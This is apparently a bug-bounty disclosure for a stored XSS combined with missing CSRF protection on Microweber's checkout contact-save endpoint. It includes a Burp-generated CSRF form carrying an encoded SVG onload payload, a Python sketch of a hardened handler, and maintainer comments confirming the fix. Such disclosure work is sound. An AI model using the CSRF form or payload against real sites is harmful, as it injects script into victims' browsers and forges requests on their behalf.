Cross-site Scripting (XSS) - Stored in microweber/microweber

Valid

Reported on

Jun 25th 2021


✍️ Description

Hello, I found CSRF + XSS on the website, so the impact of the XSS could be demonstrated.

There is no CSRF token or protection on: http://example.microweber.me/checkout/contact-information-save

CSRF HTML PoC:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://example.microweber.me/checkout/contact-information-save" method="POST">
      <input type="hidden" name="first&#95;name" value="&quot;&gt;&lt;svg&#32;onLoad&#61;alert&#40;5555&#41;&gt;" />
      <input type="hidden" name="last&#95;name" value="&quot;&gt;&lt;svg&#32;onLoad&#61;alert&#40;5555&#41;&gt;" />
      <input type="hidden" name="email" value="asdf&#64;gmail&#46;com" />
      <input type="hidden" name="phone" value="000000000" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

When we submit the request, the XSS gets executed at the same time. Also, the personal information always stays there, so it counts as Stored XSS.

Video of me showing everything: https://youtu.be/H9XTNUzdtHg

💥 Impact

JS executed in the victim's browser while the person is in Checkout.
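Added example (not part of the report and not Microweber's own code): a minimal Python model of the contact-information-save handler with the two controls the report shows were missing, a session-bound CSRF token check and HTML encoding of the stored fields on output. The handler and session names are hypothetical; the payload is the one from the PoC above, reused as a constructed test input.

```python
import hmac
import html
import secrets

# Exact payload from the report's PoC, used here only as constructed test input.
POC_PAYLOAD = '"><svg onLoad=alert(5555)>'
SITE_ORIGIN = "https://example.microweber.me"

class Session:
    """Hypothetical per-user server-side session: CSRF token plus saved contact."""
    def __init__(self):
        self.csrf_token = secrets.token_hex(32)
        self.contact = {}

def issue_form_token(session):
    """Value the legitimate checkout form embeds in a hidden _token field."""
    return session.csrf_token

def contact_information_save(session, form, origin=None):
    """Hardened handler; returns (status, message).

    Rejects the request unless the token bound to this session is present and
    matches (constant-time compare). As defence in depth, a POST carrying an
    Origin header from another site is rejected too. Values are stored raw;
    escaping happens at render time, where the output context is known.
    """
    token = form.get("_token", "")
    if not hmac.compare_digest(token.encode(), session.csrf_token.encode()):
        return 403, "missing or invalid CSRF token"
    if origin is not None and origin != SITE_ORIGIN:
        return 403, "cross-origin request rejected"
    for field in ("first_name", "last_name", "email", "phone"):
        session.contact[field] = form.get(field, "")
    return 200, "saved"

def render_contact(session):
    """Checkout form fragment: every stored value is HTML-attribute-escaped."""
    c = session.contact
    return "".join(
        f'<input name="{f}" value="{html.escape(c.get(f, ""), quote=True)}">'
        for f in ("first_name", "last_name")
    )

def render_contact_unsafe(session):
    """What the vulnerable version effectively did: raw interpolation."""
    c = session.contact
    return f'<input name="first_name" value="{c.get("first_name", "")}">'
```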

Z-Old
2 years ago

Admin


Hey kirareys, since I was not able to find a security policy or other method of contact, I've created an issue on the repo asking for a way to responsibly disclose this vulnerability. Waiting to hear back; good job!

We have contacted a member of the microweber team and are waiting to hear back 2 years ago
microweber/microweber maintainer validated this vulnerability 2 years ago
kirareys has been awarded the disclosure bounty
The fix bounty is now up for grabs
microweber/microweber maintainer marked this as fixed with commit 846a63 2 years ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
microweber/microweber maintainer
2 years ago

Maintainer


Hello, thanks for the report. This is a valid issue and has now been fixed in this commit: https://github.com/microweber/microweber/commit/846a63ca216eee5a934f6f616d4a2fac4cc899cf

kirareys
2 years ago

Researcher


Nice, thanks for the attention :) Regards
